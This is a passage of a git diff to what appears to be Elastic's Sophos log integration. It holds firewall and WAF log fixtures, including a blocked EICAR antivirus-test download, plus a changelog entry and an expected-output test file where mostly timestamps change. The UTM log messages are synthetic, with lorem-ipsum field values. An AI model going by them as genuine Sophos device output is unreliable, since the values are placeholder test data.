user_name="jsmith" server=www.iviewtest.com:8990 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol="HTTP/1.1" url=/download/eicarcom2.zip querystring= cookie="; PHPSESSID=jetkd9iadd969hsr77jpj4q974; _pk_id.1.fc3a=3a6250e215194a92.1485866024.1.1485866069.1485866024.; _pk_ses.1.fc3a=*" referer=http://www.iviewtest.com:8990/85-0-Download.html method=GET httpstatus=403 reason="Antivirus" extra="EICAR-AV-Test" contenttype="text/html" useragent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" host=10.198.235.254 responsetime=403214 bytessent=739 bytesrcv=715 fw_rule_id=6 -<30>device="SFW" date=2020-05-20 time=18:03:31 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=- sourceip=83.97.20.30 localip=216.167.51.72 ws_protocol="HTTP/1.0" url=/ querystring="" cookie="-" referer="-" method=GET httpstatus=403 reason="WAF Anomaly" extra="Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header" contenttype="text/html" useragent="-" host=83.97.20.30 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3 +<30>device="SFW" date=2020-05-20 time=18:03:31 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=- sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol="HTTP/1.0" url=/ querystring="" cookie="-" referer="-" method=GET httpstatus=403 reason="WAF Anomaly" extra="Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header" contenttype="text/html" useragent="-" host=175.16.199.1 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3 <30>device="SFW" date=2017-02-01 time=14:17:35 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=106025618011 log_type="Wireless Protection" log_component="Wireless Protection" log_subtype="Information" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_SSID=2 <30>device="SFW" date=2017-02-01 time=14:19:47 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=106025618011 log_type="Wireless Protection" log_component="Wireless Protection" log_subtype="Information" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_SSID=3 diff --git a/packages/sophos/changelog.yml b/packages/sophos/changelog.yml index e941ed0fa27..6b684c00e56 100644 --- a/packages/sophos/changelog.yml +++ b/packages/sophos/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.1.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json b/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json index 8d31ba352c5..0674711607a 100644 --- a/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json @@ -6,7 +6,7 @@ }, "message": "2016:1:29-06:09:59 localhost.localdomain smtpd[905]: MASTER[nnumqua]: QR globally disabled, status one set to 'disabled'", "event": { - "ingested": "2021-10-26T10:41:54.238959724Z" + "ingested": "2021-12-09T13:44:53.093892Z" }, "tags": [ "preserve_original_event" @@ -18,7 +18,7 @@ }, "message": "2016:2:12-13:12:33 astarosg_TVM[5716]: id=ommod severity=medium sys=inima sub=tlabo name=web request blocked, forbidden application detectedaction=accept method=ugiatnu client=stiae facility=nofdeF user=sunt srcip=10.57.170.140 dstip=10.213.231.72 version=1.5102 storage=emips ad_domain=imadmi object=ostrume class=molest type=upt attributes=uiineavocount=tisetq node=irati account=icistatuscode=giatquov cached=eritquii profile=dexeac filteraction=iscinge size=6992 request=oreseos url=https://mail.example.net/tati/utaliqu.html?iquaUten=santium#iciatisu referer=https://www5.example.org/eporroqu/uat.txt?atquovo=suntinc#xeac error=nidolo authtime=tatn dnstime=eli cattime=nnu avscantime=dolo fullreqtime=Loremip device=idolor auth=emeumfu ua=CSed exceptions=lupt group=psaquae category=oinBCSe categoryname=mnisist content-type=sedd reputation=uatD application=iunt app-id=temveleu reason=colabo filename=eme file=numqu extension=qui time=civeli function=block line=agnaali message=gnam fwrule=tat seq=ipitla initf=enp0s7281 outitf=enp0s7084 dstmac=01:00:5e:de:94:f6 srcmac=01:00:5e:1d:c1:c0 proto=den length=tutla tos=olorema prec=;iades ttl=siarchi srcport=2289 dstport=3920 tcpflags=mqu info=apariat prec=tlabore caller=untmolli engine=remi localip=saute host=ercit2385.internal.home extra=run server=10.47.202.102 cookie=quirat set-cookie=llu", "event": { - "ingested": "2021-10-26T10:41:54.238967575Z" + "ingested": "2021-12-09T13:44:53.093896500Z" }, "tags": [ "preserve_original_event" @@ -30,7 +30,7 @@ }, "message": "2016:2:26-20:15:08 eirure7587.internal.localhost reverseproxy: [mpori] [aaliquaU:medium] [pid 3905:lpaqui] (22)No form context found: [client sitame] No form context found when parsing iadese tag, referer: https://api.example.com/utla/utei.htm?oei=tlabori#oin", "event": { - "ingested": "2021-10-26T10:41:54.238969458Z" + "ingested": "2021-12-09T13:44:53.093900100Z" }, "tags": [ "preserve_original_event" @@ -42,7 +42,7 @@ }, "message": "2016:3:12-03:17:42 data4478.api.lan confd: id=iquipex severity=very-high sys=uradip sub=wri name=bor client=occa facility=stquidol user=itquiin srcip=10.106.239.55 version=1.3129 storage=atevel object=nsecte class=itame type=eumfug attributes=litcount=asun node=estia account=eaq", "event": { - "ingested": "2021-10-26T10:41:54.238970905Z" + "ingested": "2021-12-09T13:44:53.093906100Z" }, "tags": [ "preserve_original_event" @@ -54,7 +54,7 @@ }, "message": "2016:3:26-10:20:16 ctetura3009.www5.corp reverseproxy: [lita] [adeseru:medium] [pid 7692:eaq] amest configured -- corp normal operations", "event": { - "ingested": "2021-10-26T10:41:54.238972308Z" + "ingested": "2021-12-09T13:44:53.093910400Z" }, "tags": [ "preserve_original_event" @@ -66,7 +66,7 @@ }, "message": "2016:4:9-17:22:51 localhost smtpd[1411]: MASTER[inculpa]: QR globally disabled, status one set to 'disabled'", "event": { - "ingested": "2021-10-26T10:41:54.238973712Z" + "ingested": "2021-12-09T13:44:53.093951600Z" }, "tags": [ "preserve_original_event" @@ -78,7 +78,7 @@ }, "message": "2016:4:24-00:25:25 httpproxy[176]: [nse] disk_cache_zap (non) paquioff", "event": { - "ingested": "2021-10-26T10:41:54.238975095Z" + "ingested": "2021-12-09T13:44:53.093955200Z" }, "tags": [ "preserve_original_event" @@ -90,7 +90,7 @@ }, "message": "2016:5:8-07:27:59 ptasnu6684.mail.lan reverseproxy: [orumSe] [boree:low] [pid 945:rQuisau] AH01915: Init: (10.18.13.211:205) You configured ofdeFini(irat) on the onev(aturauto) port!", "event": { - "ingested": "2021-10-26T10:41:54.238976493Z" + "ingested": "2021-12-09T13:44:53.093958900Z" }, "tags": [ "preserve_original_event" @@ -102,7 +102,7 @@ }, "message": "2016:5:22-14:30:33 ssecillu7166.internal.lan barnyard: Initializing daemon mode", "event": { - "ingested": "2021-10-26T10:41:54.238978004Z" + "ingested": "2021-12-09T13:44:53.093963Z" }, "tags": [ "preserve_original_event" @@ -114,7 +114,7 @@ }, "message": "2016:6:5-21:33:08 ore5643.api.lan reverseproxy: [metco] [acom:high] [pid 2164:nim] ModSecurity: utaliqu compiled version=\"rsi\"; loaded version=\"taliqui\"", "event": { - "ingested": "2021-10-26T10:41:54.238979379Z" + "ingested": "2021-12-09T13:44:53.093967800Z" }, "tags": [ "preserve_original_event" @@ -126,7 +126,7 @@ }, "message": "2016:6:20-04:35:42 ciun39.localdomain reverseproxy: [iatqu] [inBCSedu:high] [pid 4006:rorsit] AH00098: pid file tionemu overwritten -- Unclean shutdown of previous Apache run?", "event": { - "ingested": "2021-10-26T10:41:54.238980805Z" + "ingested": "2021-12-09T13:44:53.093971900Z" }, "tags": [ "preserve_original_event" @@ -138,7 +138,7 @@ }, "message": "2016:7:4-11:38:16 atatnon6064.www.invalid reverseproxy: [magnid] [adol:low] [pid 1263:roide] AH00291: long lost child came home! (pid tem)", "event": { - "ingested": "2021-10-26T10:41:54.238982391Z" + "ingested": "2021-12-09T13:44:53.093977400Z" }, "tags": [ "preserve_original_event" @@ -150,7 +150,7 @@ }, "message": "2016:7:18-18:40:50 gitse2463.www5.invalid aua: id=tvolup severity=low sys=sci sub=col name=web request blocked srcip=10.42.252.243 user=agnaaliq caller=est engine=mquisno", "event": { - "ingested": "2021-10-26T10:41:54.238983824Z" + "ingested": "2021-12-09T13:44:53.093981400Z" }, "tags": [ "preserve_original_event" @@ -162,7 +162,7 @@ }, "message": "2016:8:2-01:43:25 httpproxy[2078]: [mol] sc_server_cmd (umdolors) decrypt failed", "event": { - "ingested": "2021-10-26T10:41:54.238985234Z" + "ingested": "2021-12-09T13:44:53.093986300Z" }, "tags": [ "preserve_original_event" @@ -174,7 +174,7 @@ }, "message": "2016:8:16-08:45:59 oriosam6277.mail.localdomain frox: Listening on 10.169.5.162:6676", "event": { - "ingested": "2021-10-26T10:41:54.238986776Z" + "ingested": "2021-12-09T13:44:53.093990300Z" }, "tags": [ "preserve_original_event" @@ -186,7 +186,7 @@ }, "message": "2016:8:30-15:48:33 ptate3830.internal.localhost reverseproxy: [quamqua] [ntut:high] [pid 5996:meum] AH02572: Failed to configure at least one certificate and key for mini:Loremip", "event": { - "ingested": "2021-10-26T10:41:54.238988168Z" + "ingested": "2021-12-09T13:44:53.093995100Z" }, "tags": [ "preserve_original_event" @@ -198,7 +198,7 @@ }, "message": "2016:9:13-22:51:07 nvo6105.invalid reverseproxy: [amquaer] [aqui:medium] [pid 3340:lpa] AH00020: Configuration Failed, isn", "event": { - "ingested": "2021-10-26T10:41:54.238989678Z" + "ingested": "2021-12-09T13:44:53.093999100Z" }, "tags": [ "preserve_original_event" @@ -210,7 +210,7 @@ }, "message": "2016:9:28-05:53:42 afcd[2492]: Classifier configuration reloaded successfully", "event": { - "ingested": "2021-10-26T10:41:54.238991078Z" + "ingested": "2021-12-09T13:44:53.094003900Z" }, "tags": [ "preserve_original_event" @@ -222,7 +222,7 @@ }, "message": "2016:10:12-12:56:16 edic2758.api.domain confd: id=olabori severity=medium sys=atatnon sub=lica name=secil client=uisnos facility=olores user=scipit srcip=10.54.169.175 version=1.5889 storage=onorumet object=ptatema class=eavolup type=ipsumq attributes=evitcount=tno node=iss account=taspe", "event": { - "ingested": "2021-10-26T10:41:54.238992517Z" + "ingested": "2021-12-09T13:44:53.094007900Z" }, "tags": [ "preserve_original_event" @@ -234,7 +234,7 @@ }, "message": "2016:10:26-19:58:50 aua[32]: id=mmo severity=high sys=tlaboru sub=aeabillo name=checking if admin is enabled srcip=10.26.228.145 user=eruntmo caller=nimve engine=usanti", "event": { - "ingested": "2021-10-26T10:41:54.238993952Z" + "ingested": "2021-12-09T13:44:53.094012800Z" }, "tags": [ "preserve_original_event" @@ -246,7 +246,7 @@ }, "message": "2016:11:10-03:01:24 sshd[2051]: Server listening on 10.59.215.207 port 6195.", "event": { - "ingested": "2021-10-26T10:41:54.238995323Z" + "ingested": "2021-12-09T13:44:53.094016800Z" }, "tags": [ "preserve_original_event" @@ -258,7 +258,7 @@ }, "message": "2016:11:24-10:03:59 ectobeat3157.mail.local reverseproxy: [uasiarch] [Malor:low] [pid 170:cillumdo] AH02312: Fatal error initialising mod_ssl, ditau.", "event": { - "ingested": "2021-10-26T10:41:54.238996701Z" + "ingested": "2021-12-09T13:44:53.094021500Z" }, "tags": [ "preserve_original_event" @@ -270,7 +270,7 @@ }, "message": "2016:12:8-17:06:33 ident2323.internal.corp reverseproxy: [hend] [remagna:high] [pid 873:aparia] AH01909: 10.144.21.112:90:epteurs server certificate does NOT include an ID which matches the server name", "event": { - "ingested": "2021-10-26T10:41:54.238998072Z" + "ingested": "2021-12-09T13:44:53.094025500Z" }, "tags": [ "preserve_original_event" @@ -282,7 +282,7 @@ }, "message": "2016:12:23-00:09:07 ttenb4581.www.host httpproxy: [rem] main (exer) shutdown finished, exiting", "event": { - "ingested": "2021-10-26T10:41:54.238999588Z" + "ingested": "2021-12-09T13:44:53.094030600Z" }, "tags": [ "preserve_original_event" @@ -294,7 +294,7 @@ }, "message": "2017:1:6-07:11:41 lapari5763.api.invalid frox: Listening on 10.103.2.48:4713", "event": { - "ingested": "2021-10-26T10:41:54.239000967Z" + "ingested": "2021-12-09T13:44:53.094034600Z" }, "tags": [ "preserve_original_event" @@ -306,7 +306,7 @@ }, "message": "2017:1:20-14:14:16 elites4713.www.localhost ulogd: id=serr severity=very-high sys=olore sub=onemul name=portscan detected action=deny fwrule=remeum seq=etur initf=lo6086 outitf=lo272 dstmac=01:00:5e:51:b9:4d srcmac=01:00:5e:15:3a:74 srcip=10.161.51.135 dstip=10.52.190.18 proto=isni length=quid tos=aUten prec=Duis ttl=uisq srcport=7807 dstport=165 tcpflags=accus info=CSed code=tiu type=wri", "event": { - "ingested": "2021-10-26T10:41:54.239002378Z" + "ingested": "2021-12-09T13:44:53.094039400Z" }, "tags": [ "preserve_original_event" @@ -318,7 +318,7 @@ }, "message": "2017:2:3-21:16:50 sam1795.invalid reverseproxy: [lorese] [olupta:low] [pid 3338:iqui] AH02312: Fatal error initialising mod_ssl, animide.", "event": { - "ingested": "2021-10-26T10:41:54.239003759Z" + "ingested": "2021-12-09T13:44:53.094043400Z" }, "tags": [ "preserve_original_event" @@ -330,7 +330,7 @@ }, "message": "2017:2:18-04:19:24 confd[10]: id=arch severity=high sys=data sub=ugits name=ittenb client=tobeatae facility=ntut user=llum srcip=10.232.108.32 version=1.5240 storage=idolo object=mqu class=mquido type=ende attributes=ntmollitcount=tisu node=ionofdeF account=rsp", "event": { - "ingested": "2021-10-26T10:41:54.239005245Z" + "ingested": "2021-12-09T13:44:53.094048300Z" }, "tags": [ "preserve_original_event" @@ -342,7 +342,7 @@ }, "message": "2017:3:4-11:21:59 nostrum6305.internal.localhost astarosg_TVM: id=llitani severity=high sys=itametco sub=etcons name=web request blocked, forbidden url detectedaction=allow method=iuntN client=utfugi facility=ursintoc user=tio srcip=10.89.41.97 dstip=10.231.116.175 version=1.5146 storage=lup ad_domain=mipsamv object=exeacomm class=sequines type=cto attributes=cusacount=nderi node=tem account=tcustatuscode=eumiu cached=nim profile=pteurs filteraction=ercitati size=835 request=ptat url=https://mail.example.net/velillu/ecatcupi.txt?rsitamet=leumiur#ssequamn referer=https://example.com/taliqui/idi.txt?undeomn=ape#itaspe error=ari authtime=umtot dnstime=onemulla cattime=atquo avscantime=borio fullreqtime=equatD device=uidol auth=inculpa ua=ruredol exceptions=iadeseru group=loremagn category=acons categoryname=nimadmi content-type=lapa reputation=emoenimi application=iquipex app-id=mqu reason=onorume filename=abill file=ametcon extension=ofdeFini time=tasnu function=deny line=tionev message=uasiarch fwrule=velites seq=uredolor initf=lo1543 outitf=lo6683 dstmac=01:00:5e:8c:f2:06 srcmac=01:00:5e:6f:71:02 proto=plica length=asiarc tos=lor prec=;nvolupt ttl=dquia srcport=5334 dstport=1525 tcpflags=umfugiat info=quisnos prec=utf caller=dolor engine=dexe localip=nemul host=Duis583.api.local extra=eavolupt server=10.17.51.153 cookie=aperiame set-cookie=stenat", "event": { - "ingested": "2021-10-26T10:41:54.239006658Z" + "ingested": "2021-12-09T13:44:53.094052300Z" }, "tags": [ "preserve_original_event" @@ -354,7 +354,7 @@ }, "message": "2017:3:18-18:24:33 xeaco7887.www.localdomain aua: id=hite severity=very-high sys=ugitsed sub=dminimve name=Packet accepted srcip=10.137.165.144 user=uptate caller=tot engine=reme", "event": { - "ingested": "2021-10-26T10:41:54.239008073Z" + "ingested": "2021-12-09T13:44:53.094057100Z" }, "tags": [ "preserve_original_event" @@ -366,7 +366,7 @@ }, "message": "2017:4:2-01:27:07 reverseproxy[5430]: ARGS:userPermissions: [\\\\x22dashletAccessAlertingRecentAlertsPanel\\\\x22,\\\\x22dashletAccessAlerterTopAlertsDashlet\\\\x22,\\\\x22accessViewRules\\\\x22,\\\\x22deployLiveResources\\\\x22,\\\\x22vi...\"] [severity [hostname \"iscivel3512.invalid\"] [uri \"atcupi\"] [unique_id \"eriti\"]", "event": { - "ingested": "2021-10-26T10:41:54.239009463Z" + "ingested": "2021-12-09T13:44:53.094061200Z" }, "tags": [ "preserve_original_event" @@ -378,7 +378,7 @@ }, "message": "2017:4:16-08:29:41 sockd[6181]: dante/server 1.202 running", "event": { - "ingested": "2021-10-26T10:41:54.239010837Z" + "ingested": "2021-12-09T13:44:53.094068Z" }, "tags": [ "preserve_original_event" @@ -390,7 +390,7 @@ }, "message": "2017:4:30-15:32:16 dolor5799.home afcd: Classifier configuration reloaded successfully", "event": { - "ingested": "2021-10-26T10:41:54.239012212Z" + "ingested": "2021-12-09T13:44:53.094072200Z" }, "tags": [ "preserve_original_event" @@ -402,7 +402,7 @@ }, "message": "2017:5:14-22:34:50 oreseosq1859.api.lan reverseproxy: [mmodic] [essequam:low] [pid 6691:ficiade] [client uiinea] [uianonn] virus daemon connection problem found in request https://www5.example.com/dantium/ors.htm?sinto=edi#eumiure, referer: https://example.com/adeser/mSe.gif?aute=rchite#rcit", "event": { - "ingested": "2021-10-26T10:41:54.239013606Z" + "ingested": "2021-12-09T13:44:53.094077Z" }, "tags": [ "preserve_original_event" @@ -414,7 +414,7 @@ }, "message": "2017:5:29-05:37:24 confd-sync[6908]: id=smoditem severity=very-high sys=tev sub=oNemoeni name=luptatem", "event": { - "ingested": "2021-10-26T10:41:54.239015096Z" + "ingested": "2021-12-09T13:44:53.094081100Z" }, "tags": [ "preserve_original_event" @@ -426,7 +426,7 @@ }, "message": "2017:6:12-12:39:58 autodit272.www.localhost reverseproxy: [oriss] [imadmin:very-high] [pid 1121:urve] ModSecurity: sBonoru compiled version=\"everi\"; loaded version=\"squ\"", "event": { - "ingested": "2021-10-26T10:41:54.239016494Z" + "ingested": "2021-12-09T13:44:53.094086Z" }, "tags": [ "preserve_original_event" @@ -438,7 +438,7 @@ }, "message": "2017:6:26-19:42:33 rporis6787.www5.localdomain reverseproxy: [quasiarc] [pta:low] [pid 3705:liqu] [client ipsu] AH01114: siarch: failed to make connection to backend: 10.148.21.7", "event": { - "ingested": "2021-10-26T10:41:54.239017870Z" + "ingested": "2021-12-09T13:44:53.094090300Z" }, "tags": [ "preserve_original_event" @@ -450,7 +450,7 @@ }, "message": "2017:7:11-02:45:07 reprehe5661.www.lan reverseproxy: rManage\\\\x22,\\\\x22manageLiveSystemSettings\\\\x22,\\\\x22accessViewJobs\\\\x22,\\\\x22exportList\\\\...\"] [ver \"olor\"] [maturity \"corpo\"] [accuracy \"commod\"] iumd [hostname \"ntore4333.api.invalid\"] [uri \"sitv\"] [unique_id \"equam\"]", "event": { - "ingested": "2021-10-26T10:41:54.239019257Z" + "ingested": "2021-12-09T13:44:53.094095100Z" }, "tags": [ "preserve_original_event" @@ -462,7 +462,7 @@ }, "message": "2017:7:25-09:47:41 exim[2384]: aeca-ugitse-ameiu utei:caecat:lumquid oluptat sequatD163.internal.example [10.151.206.38]:5794 lits", "event": { - "ingested": "2021-10-26T10:41:54.239020647Z" + "ingested": "2021-12-09T13:44:53.094099100Z" }, "tags": [ "preserve_original_event" @@ -474,7 +474,7 @@ }, "message": "2017:8:8-16:50:15 elillu5777.www5.lan pluto: \"elaudant\"[olup] 10.230.4.70 #ncu: starting keying attempt quaturve of an unlimited number", "event": { - "ingested": "2021-10-26T10:41:54.239022018Z" + "ingested": "2021-12-09T13:44:53.094103400Z" }, "tags": [ "preserve_original_event" @@ -486,7 +486,7 @@ }, "message": "2017:8:22-23:52:50 ecatcup3022.mail.invalid xl2tpd: Inherited by nproide", "event": { - "ingested": "2021-10-26T10:41:54.239023418Z" + "ingested": "2021-12-09T13:44:53.094107400Z" }, "tags": [ "preserve_original_event" @@ -498,7 +498,7 @@ }, "message": "2017:9:6-06:55:24 qui7797.www.host ipsec_starter: Starting strongSwan umet IPsec [starter]...", "event": { - "ingested": "2021-10-26T10:41:54.239024768Z" + "ingested": "2021-12-09T13:44:53.094111100Z" }, "tags": [ "preserve_original_event" @@ -510,7 +510,7 @@ }, "message": "2017:9:20-13:57:58 nofdeFin2037.mail.example reverseproxy: [quatD] [nevol:high] [pid 3994:Sectio] [client tiumdol] [laud] cannot read reply: Operation now in progress (115), referer: https://example.org/tquov/natu.jpg?uianonnu=por#nve", "event": { - "ingested": "2021-10-26T10:41:54.239028112Z" + "ingested": "2021-12-09T13:44:53.094115Z" }, "tags": [ "preserve_original_event" @@ -522,7 +522,7 @@ }, "message": "2017:10:4-21:00:32 sockd[7264]: dante/server 1.3714 running", "event": { - "ingested": "2021-10-26T10:41:54.239029550Z" + "ingested": "2021-12-09T13:44:53.094119800Z" }, "tags": [ "preserve_original_event" @@ -534,7 +534,7 @@ }, "message": "2017:10:19-04:03:07 eFinib2403.api.example reverseproxy: [utaliq] [sun:high] [pid 4074:uredol] [client quatD] [enimad] ecatcu while reading reply from cssd, referer: https://mail.example.org/urautod/eveli.html?rese=nonproi#doconse", "event": { - "ingested": "2021-10-26T10:41:54.239030947Z" + "ingested": "2021-12-09T13:44:53.094123900Z" }, "tags": [ "preserve_original_event" @@ -546,7 +546,7 @@ }, "message": "2017:11:2-11:05:41 confd[4939]: id=acons severity=high sys=adipisc sub=omnisist name=orroqui client=sci facility=psamvolu user=itsedqui srcip=10.244.96.61 version=1.2707 storage=onevol object=ese class=reprehen type=Exce attributes=toccacount=tinvolu node=ecatc account=iumt", "event": { - "ingested": "2021-10-26T10:41:54.239034069Z" + "ingested": "2021-12-09T13:44:53.094128900Z" }, "tags": [ "preserve_original_event" @@ -558,7 +558,7 @@ }, "message": "2017:11:16-18:08:15 named[1900]: reloading eddoei iono", "event": { - "ingested": "2021-10-26T10:41:54.239035475Z" + "ingested": "2021-12-09T13:44:53.094132900Z" }, "tags": [ "preserve_original_event" @@ -570,7 +570,7 @@ }, "message": "2017:12:1-01:10:49 obeatae2042.www.domain reverseproxy: [dquian] [isaute:low] [pid 1853:utfugit] (70007)The ula specified has expired: [client quaUteni] AH01110: error reading response", "event": { - "ingested": "2021-10-26T10:41:54.239036871Z" + "ingested": "2021-12-09T13:44:53.094137900Z" }, "tags": [ "preserve_original_event" @@ -582,7 +582,7 @@ }, "message": "2017:12:15-08:13:24 aerat1267.www5.example pop3proxy: Master started", "event": { - "ingested": "2021-10-26T10:41:54.239038237Z" + "ingested": "2021-12-09T13:44:53.094143600Z" }, "tags": [ "preserve_original_event" @@ -594,7 +594,7 @@ }, "message": "2017:12:29-15:15:58 writt2238.internal.localdomain reverseproxy: [uaer] [aed:low] [pid 478:ain] [client scingeli] [uatDuis] mod_avscan_check_file_single_part() called with parameter filename=imip", "event": { - "ingested": "2021-10-26T10:41:54.239039603Z" + "ingested": "2021-12-09T13:44:53.094149200Z" }, "tags": [ "preserve_original_event" @@ -606,7 +606,7 @@ }, "message": "2018:1:12-22:18:32 siutaliq4937.api.lan reverseproxy: [siutaliq] [urvel:very-high] [pid 7721:ntium] [imadmi] Hostname in dquiac request (liquide) does not match the server name (uatD)", "event": { - "ingested": "2021-10-26T10:41:54.239041108Z" + "ingested": "2021-12-09T13:44:53.094154300Z" }, "tags": [ "preserve_original_event" @@ -618,7 +618,7 @@ }, "message": "2018:1:27-05:21:06 URID[7596]: T=BCSedut ------ 1 - [exit] accept: ametco", "event": { - "ingested": "2021-10-26T10:41:54.239042484Z" + "ingested": "2021-12-09T13:44:53.094160100Z" }, "tags": [ "preserve_original_event" @@ -630,7 +630,7 @@ }, "message": "2018:2:10-12:23:41 astarosg_TVM[1090]: id=udex severity=low sys=iam sub=animi name=UDP flood detectedaction=allow method=nsectetu client=spici facility=untutl user=hen srcip=10.214.167.164 dstip=10.76.98.53 version=1.3726 storage=uovolup ad_domain=expl object=animi class=mdoloree type=mullamco attributes=tnulcount=ons node=radip account=amremapstatuscode=dolorsit cached=atisund profile=isnostru filteraction=quepo size=5693 request=nisi url=https://api.example.org/iono/secillum.txt?apariat=tse#enbyCi referer=https://example.com/eetdol/aut.jpg?pitlab=tutlabor#imadmi error=nculp authtime=quamnihi dnstime=nimadmi cattime=mquiado avscantime=agn fullreqtime=dip device=urmag auth=nim ua=laboreet exceptions=tutlabo group=incid category=der categoryname=totamrem content-type=eaqu reputation=itani application=mni app-id=runtmol reason=uaer filename=nor file=saut extension=olest time=volu function=block line=osam message=ncid fwrule=loremagn seq=uisau initf=lo1255 outitf=eth965 dstmac=01:00:5e:2f:c3:3e srcmac=01:00:5e:65:2d:fe proto=ictasun length=iumto tos=ciun prec=;prehe ttl=essec srcport=4562 dstport=2390 tcpflags=uaera info=nsequa prec=yCicero caller=orporis engine=oluptate localip=tesseq host=tenbyCi4371.www5.localdomain extra=spernatu server=10.98.126.206 cookie=tion set-cookie=tNeque", "event": { - "ingested": "2021-10-26T10:41:54.239043939Z" + "ingested": "2021-12-09T13:44:53.094165800Z" }, "tags": [ "preserve_original_event" @@ -642,7 +642,7 @@ }, "message": "2018:2:24-19:26:15 ulogd[6722]: id=persp severity=medium sys=orev sub=lapa name=Packet logged action=allow fwrule=adminim seq=isiutali initf=lo7088 outitf=eth6357 dstmac=01:00:5e:9a:fe:91 srcmac=01:00:5e:78:1a:5a srcip=10.203.157.250 dstip=10.32.236.117 proto=turm length=quamei tos=nvento prec=nama ttl=ema srcport=6585 dstport=5550 tcpflags=xeacomm info=oriosa code=erspici type=oreeu", "event": { - "ingested": "2021-10-26T10:41:54.239045329Z" + "ingested": "2021-12-09T13:44:53.094171700Z" }, "tags": [ "preserve_original_event" @@ -654,7 +654,7 @@ }, "message": "2018:3:11-02:28:49 ectob5542.www5.corp reverseproxy: [agni] [ivelit:high] [pid 7755:uovol] AH00959: ap_proxy_connect_backend disabling worker for (10.231.77.26) for volups", "event": { - "ingested": "2021-10-26T10:41:54.239046770Z" + "ingested": "2021-12-09T13:44:53.094177400Z" }, "tags": [ "preserve_original_event" @@ -666,7 +666,7 @@ }, "message": "2018:3:25-09:31:24 iusmo901.www.home httpd: id=scivelit severity=high sys=untut sub=siu name=Authentication successfulaction=allow method=icons client=hende facility=umdol user=Sedutper srcip=10.2.24.156 dstip=10.113.78.101 version=1.2707 storage=amqua ad_domain=nsequatu object=aboNemoe class=mqu type=tse attributes=ntiumdcount=ueip node=amvo account=dolorsistatuscode=acc cached=quinesc profile=ulpaq filteraction=usa size=5474 request=tob url=https://www.example.org/imipsamv/doeiu.jpg?nderit=ficia#tru referer=https://mail.example.org/natuser/olupt.txt?ipsumqu=nsec#smo error=avolup authtime=litse dnstime=archit cattime=nde avscantime=tNequepo fullreqtime=byCicer device=imvenia auth=ipit ua=tdolorem exceptions=nderitin group=mquiado category=ssequa categoryname=nisist content-type=temvele reputation=ofd application=quam app-id=umdol reason=porincid filename=tisetqu file=pici extension=erit time=ehenderi function=block line=fugiatqu message=Duisaute fwrule=uptat seq=hende initf=lo3680 outitf=lo4358 dstmac=01:00:5e:0a:8f:6c srcmac=01:00:5e:34:8c:d2 proto=mnis length=ainci tos=aturve prec=;tiumdol ttl=mporain srcport=6938 dstport=6939 tcpflags=dut info=aecons prec=tionemu caller=edictasu engine=quipexea localip=orsit host=tenima5715.api.example extra=snisiut server=10.92.93.236 cookie=amr set-cookie=mfug port=7174 query=exerc uid=ntoccae", "event": { - "ingested": "2021-10-26T10:41:54.239048160Z" + "ingested": "2021-12-09T13:44:53.094183200Z" }, "tags": [ "preserve_original_event" @@ -678,7 +678,7 @@ }, "message": "2018:4:8-16:33:58 astarosg_TVM[6463]: id=user severity=low sys=sequamn sub=adeseru name=File extension warned and proceededaction=accept method=mquisn client=ulamcol facility=nulamcol user=atatno srcip=10.180.169.49 dstip=10.206.69.71 version=1.3155 storage=risni ad_domain=ccaecat object=dtemp class=onproid type=ica attributes=mnisiscount=edolor node=nonnumqu account=iscivelistatuscode=urve cached=sundeomn profile=tasu filteraction=equunt size=3144 request=ilmo url=https://mail.example.net/isqua/deF.html?iameaq=orainci#adm referer=https://api.example.org/mremap/ate.htm?tlabor=cidunt#ria error=tessec authtime=cupida dnstime=ciade cattime=busBonor avscantime=enima fullreqtime=emseq device=osamni auth=umetMa ua=equatDui exceptions=its group=setquas category=nti categoryname=osamnis content-type=atisetqu reputation=ciduntut application=atisu app-id=edutpe reason=architec filename=incul file=tevelit extension=emse time=eipsaqua function=cancel line=suntincu message=lore fwrule=equatu seq=enbyCi initf=enp0s566 outitf=lo2179 dstmac=01:00:5e:2c:9d:65 srcmac=01:00:5e:1a:03:f5 proto=orema length=iusmo tos=uunturm prec=;mSect ttl=avolupta srcport=3308 dstport=1402 tcpflags=dolo info=tsed prec=corpori caller=cillumd engine=umdol localip=turmagn host=mni4032.lan extra=amrem server=10.202.65.2 cookie=queporr set-cookie=oide", "event": { - "ingested": "2021-10-26T10:41:54.239049525Z" + "ingested": "2021-12-09T13:44:53.094188900Z" }, "tags": [ "preserve_original_event" @@ -690,7 +690,7 @@ }, "message": "2018:4:22-23:36:32 iscing6960.api.invalid reverseproxy: [emipsu] [incidu:very-high] [pid 5350:itation] SSL Library Error: error:itasper:failure", "event": { - "ingested": "2021-10-26T10:41:54.239050904Z" + "ingested": "2021-12-09T13:44:53.094194500Z" }, "tags": [ "preserve_original_event" @@ -702,7 +702,7 @@ }, "message": "2018:5:7-06:39:06 httpd[793]: [ruredo:success] [pid nculpaq:mides] [client iconseq] ModSecurity: Warning. nidolo [file \"runtmoll\"] [line 